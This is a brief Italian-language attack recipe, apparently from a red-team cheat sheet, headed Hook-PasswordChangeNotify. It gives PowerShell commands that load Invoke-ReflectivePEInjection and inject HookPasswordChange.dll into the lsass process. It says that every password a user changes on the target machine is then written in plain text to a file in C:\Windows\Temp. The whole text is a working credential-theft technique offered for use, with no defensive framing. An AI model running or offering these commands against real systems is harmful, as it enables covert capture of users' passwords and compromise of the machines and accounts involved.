Hook-PasswordChangeNotify
- Eseguire il seguente comando in PowerShell:
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
- Quando un utente della macchina di destinazione modifica la password, la nuova password verrà scritta in C:\Windows\Temp\passwords.txt